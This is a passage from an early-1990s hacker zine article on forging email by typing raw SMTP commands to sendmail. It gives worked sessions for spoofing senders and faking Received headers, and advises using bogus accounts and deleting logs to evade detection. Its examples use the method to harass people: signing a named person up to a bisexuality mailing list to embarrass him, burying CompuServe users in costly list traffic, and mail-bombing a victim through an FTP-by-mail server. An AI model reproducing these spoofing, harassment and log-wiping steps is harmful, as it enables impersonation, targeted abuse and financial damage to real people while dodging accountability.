  1519.      Finally, if the government catches you attempting to vandalize another
  1520. computer system, you will probably get some sort of heavy fine, community
  1521. service, or both.
  1522.  
  1523.      Odds of any of this happening if you are smart:  < 1%.
  1524.  
  1525.  
  1526. PRECAUTIONS SUGGESTED:
  1527.  
  1528.      If you have a bogus computer account (standard issue hacker necessity)
  1529. then for crissake use that.  Don't let "them" know who really is hacking
  1530. around.  (Point of clarification, I refer to "them" an awful lot in RL and in
  1531. philes.  "They" are the boneheadded "do-gooders" who try to blame their own
  1532. lack of productivity or creativity on your committing of pseudo-crimes with a
  1533. computer.  FBI, SS, administrators, accountants, SPA "Don't Copy that Floppy"
  1534. fucks, religious quacks, stupid rednecks, right wing conservative Republican
  1535. activists, pigs, NSA, politicians who still THINK they can control us, city
  1536. officials, judges, lame jurors that think a "hacker" only gets
  1537. slap-in-the-wrist punishments, lobbyists who want to blame their own failed
  1538. software on kids, bankers, investors, and probably every last appalled person
  1539. in Stifino's Italian Restaurant when the Colorado 2600 meeting was held there
  1540. last month.  Enough of the paranoid Illuminati shit, back to the phile.)
  1541.  
  1542.      Make sure that you delete history files, logs, etc. if you have
  1543. access to them.  Try using computers that don't keep logs.  Check /usr/adm,
  1544. /etc/logs to see what logs are kept.
  1545.  
  1546.      If you can avoid using your local host (since you value network
  1547. connections in general), do so.  It can avert suspicion that your host contains
  1548. "hackers."
  1549.  
  1550.  
  1551. IF YOU EVER ARE CONFRONTED:
  1552.  
  1553.      "They must have broken into that account from some other site!"
  1554.  
  1555.      "Hackers?  Around here?  I never check 'who' when I log in."
  1556.  
  1557.      "They could have been super-user -- keep an eye out to see if the scum
  1558.       comes back."
  1559.  
  1560.      "Come on, they are probably making a big deal out of nothing.  What could
  1561.       be in e-mail that would be so bad?"
  1562.  
  1563.      "Just delete the account and the culprit will be in your office tomorrow
  1564.       morning."   (Of course, you used a bogus account.)
  1565.  
  1566.  
  1567. PART ONE:  ELECTRONIC MAIL
  1568.  
  1569.      Basically, electronic mail has become the new medium of choice for
  1570. delivering thoughts in a hurry.  It is faster than the post office, cheaper
  1571. than the post office, doesn't take vacations all the time like the post office,
  1572. and is completely free so it doesn't have unions.
  1573.  
  1574.      Of course, you know all that and would rather spend this time making damn
  1575. sure you know what SMTP is.
  1576.  
  1577.      To my knowledge, a completely accurate SMTP set of protocols hasn't been
  1578. published in any hacker journal.  The original (at least, the first I've seen)
  1579. was published in the Legion of Doom Technical Journals and covered the minimum
  1580. SMTP steps necessary for the program "sendmail," found in a typical Unix
  1581. software package.
  1582.  
  1583.      When you connect a raw socket to a remote SMTP compatible host, your
  1584. computer is expected to give a set of commands which will result in having the
  1585. sender, receiver, and message being transferred.  However, unlike people who
  1586. prefer the speed of compression and security of raw integer data, the folks at
  1587. DARPA decided that SMTP would be pretty close to English.
  1588.  
  1589.      If you are on the Internet, and you wanted to connect to the SMTP server,
  1590. type:
  1591.  
  1592.        telnet <hostname> 25
  1593.  
  1594.      Port 25 is the standard port for SMTP.  I doubt it would be too cool to
  1595. change this, since many mail servers connect to the target hosts directly.
  1596.  
  1597. [Editor's Note:  All mail and SMTP commands have been offset by a ">" at the
  1598.  beginning of each line in order not to confuse Internet mailers when sending
  1599.  this article through e-mail.]
  1600.  
  1601.      When you connect, you will get a small hostname identifier for whatever
  1602. SMTP server revision you've got.
  1603.  
  1604. 220 huggies.colorado.edu Sendmail 2.2/2.5 8/01/88 ready at Tue, 25 Aug 91
  1605. 03:14:55 edt
  1606.  
  1607.      Now that you are connected, the computer is waiting for commands.  First
  1608. of all, you are expected to explain which computer you are calling in from.
  1609. This is done with the HELO <host> command.  This can be anything at all, but if
  1610. you fail to give the exact host that you are connecting from, it causes the
  1611. following line to appear on the e-mail message the recipient gets from you:
  1612.  
  1613. > Apparently-to:  The Racketeer <rack@lycaeum.hfc.com>
  1614.  
  1615.      Instead of the classic:
  1616.  
  1617. > To:  The Racketeer <rack@lycaeum.hfc.com>
  1618.  
  1619.      This is the secret to great fakemail -- the ability to avoid the
  1620. "apparently-to" flag.  Although it is subtle, it is a pain to avoid.  In fact,
  1621. in some places, there are so many "protections" to SMTP that every outside
  1622. e-mail is marked with "Apparently-to."  Hey, their problem.
  1623.  
  1624.      So, go ahead and type the HELO command:
  1625.  
  1626. > HELO LYCAEUM.HFC.COM
  1627.  
  1628. The computer replies:
  1629.  
  1630. 250 huggies.colorado.edu Hello LYCAEUM.HFC.COM, pleased to meet you
  1631.  
  1632.     Oh, a warm reception.  Older sendmail software explains with the HELP
  1633. command that the computer doesn't care about HELO commands.  You can check it
  1634. upon login with the command "HELP HELO."
  1635.  
  1636.     Now what you will need to do is tell the computer who is supposed to get
  1637. the letter.  From this point, there are all sorts of possibilities.  First of
  1638. all, the format for the recipient would be:
  1639.  
  1640. > RCPT TO: <name@host>
  1641.  
  1642.     And *NOTE*, the "<" and ">" symbols should be present!  Some computers,
  1643. especially sticklers like Prime, won't even accept the letters unless they
  1644. adhere specifically to the protocol!  Now, if you give a local address name,
  1645. such as:
  1646.  
  1647. > RCPT TO: <smith>
  1648.  
  1649.     ...then it will treat the mail as if it were sent locally, even though it
  1650. was sent through the Internet.  Giving a computer its own host name is valid,
  1651. although there is a chance that it will claim that the machine you are calling
  1652. from had something to do with it.
  1653.  
  1654. > RCPT TO: <smith@thishost>
  1655.  
  1656.     ...will check to see if there is a "smith" at this particular computer.  If
  1657. the computer finds "smith," then it will tell you there is no problem.  If you
  1658. decide to use this computer as a forwarding host (between two other points),
  1659. you can type:
  1660.  
  1661. > RCPT TO: <smith@someotherhost>
  1662.  
  1663.      This will cause the mail to be forwarded to someotherhost's SMTP port and
  1664. the letter will no longer be a problem for you.  I'll be using this trick to
  1665. send my letter around the world.
  1666.  
  1667.      Now, after you have given the name of the person who is to receive the
  1668. letter, you have to tell the computer who is sending it.
  1669.  
  1670. > MAIL FROM: <rack@lycaeum.hfc.com>      ; Really from
  1671. > MAIL FROM: <rack>                      ; Localhost
  1672. > MAIL FROM: <rack@osi.mil>              ; Fake -- "3rd party host"
  1673. > MAIL FROM: <lycaeum.hfc.com|rack>      ; UUCP Path
  1674.  
  1675.      Essentially, if you claim the letter is from a "3rd party," then the other
  1676. machine will accept it due to UUCP style routing.  This will be explained later
  1677. on.
  1678.  
  1679.      The next step is actually entering the e-mail message.  The first few
  1680. lines of each message consists of the message title, X-Messages, headers,
  1681. Forwarding Lines, etc.  These are completely up to the individual mail program,
  1682. but a few simple standards will be printed later, but first let's run through
  1683. the step-by-step way to send fakemail.  You type anything that isn't preceded
  1684. by a number.
  1685.  
  1686. 220 hal.gnu.ai.mit.edu Sendmail AIX 3.2/UCB 5.64/4.0 ready at Tue, 21 Jul 1992
  1687. 22:15:03 -0400
  1688. > helo lycaeum.hfc.com
  1689. 250 hal.gnu.ai.mit.edu Hello lycaeum.hfc.com, pleased to meet you
  1690. > mail from: <rack@lycaeum.hfc.com>
  1691. 250 <rack@lycaeum.hfc.com>... Sender ok
  1692. > rcpt to: <phrack@gnu.ai.mit.edu>
  1693. 250 <phrack@gnu.ai.mit.edu>... Recipient ok
  1694. > data
  1695. 354 Enter mail, end with "." on a line by itself
  1696. > Yo, C.D. -- mind letting me use this account?
  1697. > .
  1698. 250 Ok
  1699. > quit
  1700.  
  1701.      Now, here are a few more advanced ways of using sendmail.  First of all,
  1702. there is the VRFY command.  You can use this for two basic things:  checking up
  1703. on a single user or checking up on a list of users.  Anyone with basic
  1704. knowledge of ANY of the major computer networks knows that there are mailing
  1705. lists which allow several people to share mail.  You can use the VRFY command
  1706. to view every member on the entire list.
  1707.  
  1708. > vrfy phrack
  1709. 250 Phrack Classic <phrack>
  1710.  
  1711.      Or, to see everyone on a mailing list:
  1712.  
  1713. > vrfy phrack-staff-list
  1714. 250 Knight Lightning <kl@stormking.com>
  1715. 250 Dispater <dispater@stormking.com>
  1716.  
  1717.      Note - this isn't the same thing as a LISTSERV -- like the one that
  1718. distributes Phrack.  LISTSERVs themselves are quite powerful tools because they
  1719. allow people to sign on and off of lists without human moderation.  Alias lists
  1720. are a serious problem to moderate effectively.
  1721.  
  1722.      This can be useful to just check to see if an account exists.  It can be
  1723. helpful if you suspect a machine has a hacked finger daemon or something to
  1724. hide the user's identity.  Getting a list of users from mailing lists doesn't
  1725. have a great deal of uses, but if you are trying very hard to learn someone's
  1726. real identity, and you suspect they are signed up to a list, just check for all
  1727. users from that particular host site and see if there are any matches.
  1728.  
  1729.      Finally, there is one last section to e-mail -- the actual message itself.
  1730. In fact, this is the most important area to concentrate on in order to avoid
  1731. the infamous "Apparently-to:" line.  Basically, the data consists of a few
  1732. lines of title information and then the actual message follows.
  1733.  
  1734.      There is a set of guidelines you must follow in order for the quotes to
  1735. appear in correct order.  You won't want to have a space separate your titles
  1736. from your name, for example.  Here is an example of a real e-mail message:
  1737.  
  1738. > From: rack@lycaeum.hfc.com
  1739. > Received: by dockmaster.ncsc.mil (5.12/3.7) id AA10000; Thu, 6 Feb 92
  1740. > 12:00:00
  1741. > Message-Id: <666.AA10000@dockmaster.ncsc.mil>
  1742. > To: RMorris@dockmaster.ncsc.mil
  1743. > Date: Thu, 06 Feb 92 12:00:00
  1744. > Title: *wave* Hello, No Such Agency dude!
  1745. >
  1746. > NIST sucks.  Say "hi" to your kid for me from all of us at Phrack!
  1747.  
  1748.     Likewise, if you try to create a message without an information line, your
  1749. message would look something like this:
  1750.  
  1751. > From: rack@lycaeum.hfc.com
  1752. > Received: by dockmaster.ncsc.mil (5.12/3.7) id AA10000; Thu, 6 Feb 92
  1753. > 12:00:00 -0500
  1754. > Message-Id: <666.AA10000@dockmaster.ncsc.mil>
  1755. > Date: Thu, 06 Feb 92 12:00:00
  1756. > Apparently-to: RMorris@dockmaster.ncsc.mil
  1757.  
  1758. > NIST sucks.  Say "hi" to your kid for me from all of us at Phrack!
  1759.  
  1760.      Basically, this looks pretty obvious that it's fakemail, not because I
  1761. altered the numbers necessarily, but because it doesn't have a title line, it
  1762. doesn't have the "Date:" in the right place, and because the "Apparently-to:"
  1763. designation was on.
  1764.  
  1765.     To create the "realistic" e-mail, you would enter:
  1766.  
  1767. > helo lycaeum.hfc.com
  1768. > mail from: <rack@lycaeum.hfc.com>
  1769. > rcpt to: <RMorris@docmaster.ncsc.mil>
  1770. > data
  1771. > To:  RMorris@dockmaster.ncsc.mil>
  1772. > Date: Thu, 06 Feb 92 12:00:00
  1773. > Title: *wave* Hello, No Such Agency dude!
  1774. >
  1775. > NIST sucks.  Say "hi" to your kid for me from all of us at Phrack!
  1776. > .
  1777.  
  1778.      Notice that, even though you are in "data" mode, you are still giving
  1779. commands to sendmail.  All of the lines can (even if only partially) be altered
  1780. through the data command.  This is perfect for sending good fakemail.  For
  1781. example:
  1782.  
  1783. > helo lycaeum.hfc.com
  1784. > mail from: <dale@opus.tymnet.com>
  1785. > rcpt to: <listserv@brownvm.brown.edu>
  1786. > data
  1787. > Received: by lycaeum.hfc.com (5.12/3.7) id AA11891; Thu 6 Feb 92 12:00:00
  1788. > Message-Id: <230.AA11891@lycaeum.hfc.com>
  1789. > To: <listserv@brownvm.brown.edu>
  1790. > Date: Thu, 06 Feb 92 12:00:00
  1791. > Title:  Ohh, sign me up Puuuleeeze.
  1792. >
  1793. > subscribe BISEXU-L Dale "Fist Me" Drew
  1794. > .
  1795.  
  1796.      Now, according to this e-mail path, you are telling the other computer
  1797. that you received this letter from OPUS.TYMNET.COM, and it is being forwarded
  1798. by your machine to BROWNVM.BROWN.EDU.  Basically, you are stepping into the
  1799. middle of the line and claiming you've been waiting there all this time.  This
  1800. is a legit method of sending e-mail!
  1801.  
  1802.      Originally, when sendmail was less automated, you had to list every
  1803. computer that your mail had to move between in order for it to arrive.  If you
  1804. were computer ALPHA, you'd have to send e-mail to account "joe" on computer
  1805. GAMMA by this address:
  1806.  
  1807. > mail to: <beta!ceti!delta!epsilon!freddy!gamma!joe>
  1808.  
  1809.      Notice that the account name goes last and the host names "lead" up to
  1810. that account.  The e-mail will be routed directly to each machine until it
  1811. finally reaches GAMMA.  This is still required today, especially between
  1812. networks like Internet and Bitnet -- where certain hosts are capable of sending
  1813. mail between networks.  This particular style of sending e-mail is called "UUCP
  1814. Style" routing.
  1815.  
  1816.      Sometimes, hosts will use the forwarding UUCP style mail addresses in case
  1817. the host has no concept of how to deal with a name address.  Your machine
  1818. simply routes the e-mail to a second host which is capable of resolving the
  1819. rest of the name.  Although these machines are going out of style, they still
  1820. exist.
  1821.  
  1822.      The third reasonable case of where e-mail will be routed between hosts is
  1823. when, instead of having each computer waste individual time dealing with each
  1824. piece of e-mail that comes about, the computer gives the mail to a dedicated
  1825. mailserver which will then deliver the mail.  This is quite common all over the
  1826. network -- especially due to the fact that the Internet is only a few T1 lines
  1827. in comparison to the multitude of 9600 and 14.4K baud modems that everyone is
  1828. so protective of people over-using.  Of course, this doesn't cause the address
  1829. to be in UUCP format, but when it reaches the other end of the network, it'll
  1830. be impossible to tell what method the letter used to get sent.
  1831.  
  1832.      Okay, now we can send fairly reasonable electronic fakemail.  This stuff
  1833. can't easily be distinguished between regular e-mail unless you either really
  1834. botched it up (say, sending fakemail between two people on the same machine by
  1835. way of 4 national hosts or something) or really had bad timing.
  1836.  
  1837.      Let's now discuss the POWER of fakemail.  Fakemail itself is basically a
  1838. great way to fool people into thinking you are someone else.  You could try to
  1839. social engineer information out of people on a machine by fakemail, but at the
  1840. same time, why not just hack the root password and use "root" to do it?  This
  1841. way you can get the reply to the mail as well.  It doesn't seem reasonable to
  1842. social engineer anything while you are root either.  Who knows.  Maybe a really
  1843. great opportunity will pop up some day -- but until then, let's forget about
  1844. dealing person-to-person with fakemail, and instead deal with
  1845. person-to-machine.
  1846.  
  1847.      There are many places on the Internet that respond to received electronic
  1848. mail automatically.  You have all of the Archie sites that will respond, all of
  1849. the Internet/Bitnet LISTSERVs, and Bitmail FTP servers.  Actually, there are
  1850. several other servers, too, such as the diplomacy adjudicator.  Unfortunately,
  1851. this isn't anywhere nearly as annoying as what you can do with other servers.
  1852.  
  1853.      First, let's cover LISTSERVs.  As you saw above, I created a fakemail
  1854. message that would sign up Mr. Dale Drew to the BISEXU-L LISTSERV.  This means
  1855. that any of the "netnews" regarding bisexual behavior on the Internet would be
  1856. sent directly to his mailbox.  He would be on this list (which is public and
  1857. accessible by anyone) and likewise be assumed to be a member of the network
  1858. bisexual community.
  1859.  
  1860.      This fakemail message would go all the way to the LISTSERV, it would
  1861. register Mr. Dictator for the BISEXU-L list, >DISCARD< my message, and, because
  1862. it thinks that Dale Drew sent the message, it will go ahead and sign him up to
  1863. receive all the bisexual information on the network.
  1864.  
  1865.      And people wonder why I don't even give out my e-mail address.
  1866.  
  1867.      The complete list of all groups on the Internet is available in the file
  1868. "list_of_lists" which is available almost everywhere so poke around
  1869. wuarchive.wustl.edu or ftp.uu.net until you find it.  You'll notice that there
  1870. are several groups that are quite fanatic and would freak out nearly anybody
  1871. who was suddenly signed up to one.
  1872.  
  1873.      Ever notice how big mega-companies like IBM squelch little people who try
  1874. to make copies of their ideas?  Even though you cannot "patent" an "idea,"
  1875. folks like IBM want you to believe they can.  They send their "brute" squad of
  1876. cheap lawyers to "legal-fee-to-death" small firms.  If you wanted to
  1877. "nickel-and-dime" someone out of existence, try considering the following:
  1878.  
  1879.      CompuServe is now taking electronic mail from the Internet.  This is good.
  1880. CompuServe charges for wasting too much of their drive space with stored
  1881. e-mail.  This is bad.  You can really freak out someone you don't like on
  1882. CompuServe by signing them up to the Dungeons and Dragons list, complete with
  1883. several megabytes of fluff per day.  This is cool.  They will then get charged
  1884. hefty fines by CompuServe.  That is fucked up.  How the hell could they know?
  1885.  
  1886.     CompuServe e-mail addresses are userid@compuserve.com, but as the Internet
  1887. users realize, they can't send commas (",") as e-mail paths.  Therefore, use a
  1888. period in place of every comma.  If your e-mail address was 767,04821 on
  1889. CompuServe then it would be 767.04821 for the Internet. CompuServe tends to
  1890. "chop" most of the message headers that Internet creates out of the mail before
  1891. it reaches the end user.  This makes them particularly vulnerable to fakemail.
  1892.  
  1893.      You'll have to check with your individual pay services, but I believe such
  1894. groups as MCI Mail also have time limitations.  Your typical non-Internet-
  1895. knowing schmuck would never figure out how to sign off of some God-awful fluff
  1896. contained LISTSERV such as the Advanced Dungeons & Dragons list.  The amount of
  1897. damage you could cause in monetary value alone to an account would be
  1898. horrendous.
  1899.  
  1900.      Some groups charge for connection time to the Internet -- admittedly, the
  1901. fees are reasonable -- I've seen the price at about $2 per hour for
  1902. communications.  However, late at night, you could cause massive e-mail traffic
  1903. on some poor sap's line that they might not catch.  They don't have a way to
  1904. shut this off, so they are basically screwed.  Be WARY, though -- this sabotage
  1905. could land you in deep shit.  It isn't actually fraud, but it could be
  1906. considered "unauthorized usage of equipment" and could get you a serious fine.
  1907. However, if you are good enough, you won't get caught and the poor fucks will
  1908. have to pay the fees themselves!
  1909.  
  1910.      Now let's investigate short-term VOLUME damage to an e-mail address.
  1911. There are several anonymous FTP sites that exist out there with a service known
  1912. as BIT FTP.  This means that a user from Bitnet, or one who just has e-mail and
  1913. no other network services, can still download files off of an FTP site.  The
  1914. "help" file on this is stored in Appendix C, regarding the usage of Digital's
  1915. FTP mail server.
  1916.  
  1917.      Basically, if you wanted to fool the FTP Mail Server into bombarding some
  1918. poor slob with an ungodly huge amount of mail, try doing a regular "fakemail"
  1919. on the guy, with the enclosed message packet:
  1920.  
  1921. > helo lycaeum.hfc.com
  1922. > mail from: <dale@opus.tymnet.com>
  1923. > rcpt to: <ftpmail@decwrl.dec.com>
  1924. > data
  1925. > Received: by lycaeum.hfc.com (5.12/3.7) id AA10992; Fri 9 Oct 92 12:00:00
  1926. > Message-Id: <230.AA11891@lycaeum.hfc.com>
  1927. > To: <listserv@brownvm.brown.edu>
  1928. > Date: Fri, 09 Oct 92 12:00:00
  1929. > Title:  Hey, I don't have THAT nifty program!
  1930. >
  1931. > reply dale@opus.tymnet.com
  1932. > connect wuarchive.wustl.edu anonymous fistme@opus.tymnet.com
  1933. > binary
  1934. > get mirrors/gnu/gcc-2.3.2.tar.Z
  1935. > quit
  1936. > .
  1937.  
  1938.         What is particularly nasty about this is that somewhere between 15 and
  1939. 20 megabytes of messages are going to be dumped into this poor guy's account.
  1940. All of the files will be uuencoded and broken down into separate messages!
  1941. Instead of deleting just one file, there will be literally hundreds of messages
  1942. to delete!  Obnoxious!  Nearly impossible to trace, too!
  1943.  
  1944.  
  1945. Part 2:  E-MAIL AROUND THE WORLD
  1946.  
  1947.      Captain Crunch happened to make a telephone call around the world, which
  1948. could have ushered in the age of phreak enlightenment -- after all, he proved
  1949. that, through the telephone, you could "touch someone" anywhere you wanted
  1950. around the world!  Billions of people could be contacted.
  1951.  
  1952.      I undoubtedly pissed off a great number of people trying to do this e-mail
  1953. trick -- having gotten automated complaints from many hosts.  Apparently, every
  1954. country has some form of NSA.  This doesn't surprise me at all, I'm just
  1955. somewhat amazed that entire HOSTS were disconnected during the times I used
  1956. them for routers.  Fortunately, I was able to switch computers faster than they
  1957. were able to disconnect them.
  1958.  
  1959.      In order to send the e-mail, I couldn't send it through a direct path.
  1960. What I had to do was execute UUCP style routing, meaning I told each host in
  1961. the path to send the e-mail to the next host in the path, etc., until the last
  1962. machine was done.  Unfortunately, the first machine I used for sending the
  1963. e-mail had a remarkably efficient router and resolved the fact that the target
  1964. was indeed the destination.  Therefore, I re-altered the path to a machine
  1965. sitting about, oh, two feet away from it.  Those two feet are meaningless in
  1966. this epic journey.
  1967.  
  1968.       The originating host names have been altered as to conceal my identity.
  1969. However, if we ever meet at a Con, I'll probably have the real print-out of the
  1970. results somewhere and you can verify its authenticity.  Regardless, most of
  1971. this same shit will work from just about any typical college campus Internet
  1972. (and even Bitnet) connected machines.
  1973.  
  1974.      In APPENDIX A, I've compiled a list of every foreign country that I could
  1975. locate on the Internet.  I figured it was relatively important to keep with the
  1976. global program and pick a series of hosts to route through that would
  1977. presumably require relatively short hops.  I did this by using this list and
  1978. trial and error (most of this information was procured from the Network
  1979. Information Center, even though they deliberately went way the hell out of
  1980. their way to make it difficult to get computers associated with foreign
  1981. countries).
  1982.  
  1983.      My ultimate choice of a path was:
  1984.  
  1985.      lycaeum.hfc.com           -- Origin, "middle" America.
  1986.      albert.gnu.ai.mit.edu     -- Massachusetts, USA.
  1987.      isgate.is                 -- Iceland
  1988.      chenas.inria.fr           -- France
  1989.      icnucevx.cnuce.cn.it      -- Italy
  1990.      sangram.ncst.ernet.in     -- India
  1991.      waseda-mail.waseda.ac.jp  -- Japan
  1992.      seattleu.edu              -- Seattle
  1993.      inferno.hfc.com           -- Ultimate Destination
  1994.  
  1995.      The e-mail address came out to be:
  1996.  
  1997. isgate.is!chenas.inria.fr!icnucevx.cnuce.cn.it!sangram.ncst.ernet.in!
  1998. waseda-mail.waseda.ac.jp!seattleu.edu!inferno.hfc.com!
  1999. rack@albert.gnu.ai.mit.edu
  2000.  
  2001.      ...meaning, first e-mail albert.gnu.ai.mit.edu, and let it parse the name
  2002. down a line, going to Iceland, then to France, etc. until it finally reaches
  2003. the last host on the list before the name, which is the Inferno, and deposits
  2004. the e-mail at rack@inferno.hfc.com.
  2005.  
  2006.      This takes a LONG time, folks.  Every failure toward the end took on
  2007. average of 8-10 hours before the e-mail was returned to me with the failure
  2008. message. In one case, in fact, the e-mail made it shore to shore and then came
  2009. all the way back because it couldn't resolve the last hostname!  That one made
  2010. it (distance-wise) all the way around the world and half again.
  2011.  
  2012.      Here is the final e-mail that I received (with dates, times, and numbers
  2013.      altered to squelch any attempt to track me):
  2014.  
  2015. > Return-Path: <rack@lycaeum.hfc.com>
  2016. > Received: from sumax.seattleu.edu [192.48.211.120] by Lyceaum.HFC.Com ; 19
  2017.         Dec 92 16:23:21 MST
  2018. > Received: from waseda-mail.waseda.ac.jp by sumax.seattleu.edu with SMTP id
  2019. >         AA28431 (5.65a/IDA-1.4.2 for rack@inferno.hfc.com); Sat, 19 Dec 92
  2020. >         14:26:01 -0800
  2021. > Received: from relay2.UU.NET by waseda-mail.waseda.ac.jp (5.67+1.6W/2.8Wb)
  2022. >         id AA28431; Sun, 20 Dec 92 07:24:04 JST
  2023. > Return-Path: <rack@lycaeum.hfc.com>
  2024. > Received: from uunet.uu.net (via LOCALHOST.UU.NET) by relay2.UU.NET with SMTP
  2025. >         (5.61/UUNET-internet-primary) id AA28431; Sat, 19 Dec 92 17:24:08 -
  2026. >         0500
  2027. > Received: from sangam.UUCP by uunet.uu.net with UUCP/RMAIL
  2028. >         (queueing-rmail) id 182330.3000; Sat, 19 Dec 1992 17:23:30 EST
  2029. > Received: by sangam.ncst.ernet.in (4.1/SMI-4.1-MHS-7.0)
  2030. >         id AA28431; Sun, 20 Dec 92 03:50:19 IST
  2031. > From: rack@lycaeum.hfc.com
  2032. > Received: from shakti.ncst.ernet.in by saathi.ncst.ernet.in
  2033. >         (5.61/Ultrix3.0-C)
  2034. >         id AA28431; Sun, 20 Dec 92 03:52:12 +0530
  2035. > Received: from saathi.ncst.ernet.in by shakti.ncst.ernet.in with SMTP
  2036. >         (16.6/16.2) id AA09700; Sun, 20 Dec 92 03:51:37 +0530
  2037. > Received: by saathi.ncst.ernet.in (5.61/Ultrix3.0-C)
  2038. >         id AA28431; Sun, 20 Dec 92 03:52:09 +0530
  2039. > Received: by sangam.ncst.ernet.in (4.1/SMI-4.1-MHS-7.0)
  2040. >         id AA28431; Sun, 20 Dec 92 03:48:24 IST
  2041. > Received: from ICNUCEVX.CNUCE.CNR.IT by relay1.UU.NET with SMTP
  2042. >         (5.61/UUNET-internet-primary) id AA28431; Sat, 19 Dec 92 17:20:23
  2043. >         -0500
  2044. > Received: from chenas.inria.fr by ICNUCEVX.CNUCE.CNR.IT (PMDF #2961 ) id
  2045. >  <01GSIP122UOW000FBT@ICNUCEVX.CNUCE.CNR.IT>; Sun, 19 Dec 1992 23:14:29 MET
  2046. > Received: from isgate.is by chenas.inria.fr (5.65c8d/92.02.29) via Fnet-EUnet
  2047. >  id AA28431; Sun, 19 Dec 1992 23:19:58 +0100 (MET)
  2048. > Received: from albert.gnu.ai.mit.edu by isgate.is (5.65c8/ISnet/14-10-91);
  2049. > Sat, 19 Dec 1992 22:19:50 GMT
  2050. > Received: from lycaeum.hfc.com by albert.gnu.ai.mit.edu (5.65/4.0) with
  2051. >  SMTP id <AA28431@albert.gnu.ai.mit.edu>; Sat, 19 Dec 92 17:19:36 -0500
  2052. > Received: by lycaeum.hfc.com (5.65/4.0) id <AA11368@lycaeum.hfc.com>;
  2053. >  Sat, 19 Dec 92 17:19:51 -0501
  2054. > Date: 19 Dec 1992 17:19:50 -0500 (EST)
  2055. > Subject: Global E-Mail
  2056. > To:   rack@inferno.hfc.com
  2057. > Message-id: <9212192666.AA11368@lycaeum.hfc.com>
  2058. > Mime-Version: 1.0
  2059. > Content-Type: text/plain; charset=US-ASCII
  2060. > Content-Transfer-Encoding: 7bit
  2061. > X-Mailer: ELM [version 2.4 PL5]
  2062. > Content-Length: 94
  2063. > X-Charset: ASCII
  2064. > X-Char-Esc: 29
  2065. >
  2066. > This Electronic Mail has been completely around the world!
  2067. >
  2068. > (and isn't even a chain letter.)
  2069.  
  2070. ===============================================================================
  2071.  
  2072. APPENDIX A:
  2073.  
  2074. List of Countries on the Internet by Root Domain
  2075.  
  2076. (I tried to get a single mail router in each domain.  The domains that don't
  2077.  have them are unavailable at my security clearance.  The computer is your
  2078.  friend.)
  2079.  
  2080. .AQ        New Zealand
  2081. .AR        Argentina        atina.ar
  2082. .AT        Austria          pythia.eduz.univie.ac.at
  2083. .BB        Barbados
  2084. .BE        Belgium          ub4b.buug.be
  2085. .BG        Bulgaria
  2086. .BO        Bolivia          unbol.bo
  2087. .BR        Brazil           fpsp.fapesp.br
  2088. .BS        Bahamas
  2089. .BZ        Belize
  2090. .CA        Canada           cs.ucb.ca
  2091. .CH        Switzerland      switch.ch
  2092. .CL        Chile            uchdcc.uchile.cl
  2093. .CN        China            ica.beijing.canet.cn
  2094. .CR        Costa Rica       huracan.cr
  2095. .CU        Cuba
  2096. .DE        Germany          deins.informatik.uni-dortmund.de
  2097. .DK        Denmark          dkuug.dk
  2098. .EC        Ecuador          ecuanex.ec
  2099. .EE        Estonia          kbfi.ee
  2100. .EG        Egypt
  2101. .FI        Finland          funet.fi
  2102. .FJ        Fiji
  2103. .FR        France           inria.inria.fr
  2104. .GB        England
  2105. .GR        Greece           csi.forth.gr
  2106. .HK        Hong Kong        hp9000.csc.cuhk.hk
  2107. .HU        Hungary          sztaki.hu
  2108. .IE        Ireland          nova.ucd.ie
  2109. .IL        Israel           relay.huji.ac.il
  2110. .IN        India            shakti.ernet.in
  2111. .IS        Iceland          isgate.is
  2112. .IT        Italy            deccnaf.infn.it
  2113. .JM        Jamaica
  2114. .JP        Japan            jp-gate.wide.ad.jp
  2115. .KR        South Korea      kum.kaist.ac.kr
  2116. .LK        Sri Lanka        cse.mrt.ac.lk
  2117. .LT        Lithuania        ma-mii.lt.su
  2118. .LV        Latvia
  2119. .MX        Mexico           mtec1.mty.itesm.mx
  2120. .MY        Malaysia         rangkom.my
  2121. .NA        Namibia
  2122. .NI        Nicaragua        uni.ni
  2123. .NL        Netherlands      sering.cwi.nl
  2124. .NO        Norway           ifi.uio.no
  2125. .NZ        New Zealand      waikato.ac.nz
  2126. .PE        Peru             desco.pe
  2127. .PG        New Guinea       ee.unitech.ac.pg
  2128. .PH        Philippines
  2129. .PK        Pakistan
  2130. .PL        Poland
  2131. .PR        Puerto Rico      sun386-gauss.pr
  2132. .PT        Portugal         ptifm2.ifm.rccn.pt
  2133. .PY        Paraguay         ledip.py
  2134. .SE        Sweden           sunic.sunet.se
  2135. .SG        Singapore        nuscc.nus.sg
  2136. .TH        Thailand
  2137. .TN        Tunisia          spiky.rsinet.tn
  2138. .TR        Turkey
  2139. .TT        Trinidad & Tobago
  2140. .TW        Taiwan           twnmoe10.edu.tw
  2141. .UK        United Kingdom   ess.cs.ucl.ac.uk
  2142. .US        United States    isi.edu
  2143. .UY        Uruguay          seciu.uy
  2144. .VE        Venezuela
  2145. .ZA        South Africa     hippo.ru.ac.za
  2146. .ZW        Zimbabwe         zimbix.uz.zw
  2147.  
  2148. ===============================================================================
  2149.  
  2150. APPENDIX B:
  2151.  
  2152. Basic SMTP Commands
  2153.  
  2154. > HELO <hostname>           Tells mail daemon what machine is calling.  This
  2155.                             will be determined anyway, so omission doesn't mean
  2156.                             anonymity.
  2157.  
  2158. > MAIL FROM: <path>         Tells where the mail came from.
  2159.  
  2160. > RCPT TO: <path>           Tells where the mail is going.
  2161.  
  2162. > DATA                      Command to start transmitting message.
  2163.  
  2164. > QUIT                      Quit mail daemon, disconnects socket.
  2165.  
  2166. > NOOP                      No Operation -- used for delays.
  2167.  
  2168. > HELP                      Gives list of commands -- sometimes disabled.
  2169.  
  2170. > VRFY                      Verifies if a path is valid on that machine.
  2171.  
  2172. > TICK                      Number of "ticks" from connection to present
  2173.                             ("0001" is a typical straight connection).
  2174.  
  2175. ===============================================================================
  2176.  
  2177. APPENDIX C:
  2178.  
  2179. BIT-FTP Help File
  2180.  
  2181.    ftpmail@decwrl.dec.com (Digital FTP mail server)
  2182.  
  2183.    Commands are:
  2184.     reply <MAILADDR>              Set reply address since headers are usually
  2185.                                   wrong.
  2186.     connect [HOST [USER [PASS]]]  Defaults to gatekeeper.dec.com, anonymous.
  2187.     ascii                         Files grabbed are printable ASCII.
  2188.     binary                        Files grabbed are compressed or tar or both.
  2189.     compress                      Compress binaries using Lempel-Ziv encoding.
  2190.     compact                       Compress binaries using Huffman encoding.
  2191.     uuencode                      Binary files will be mailed in uuencoded
  2192.                                   format.
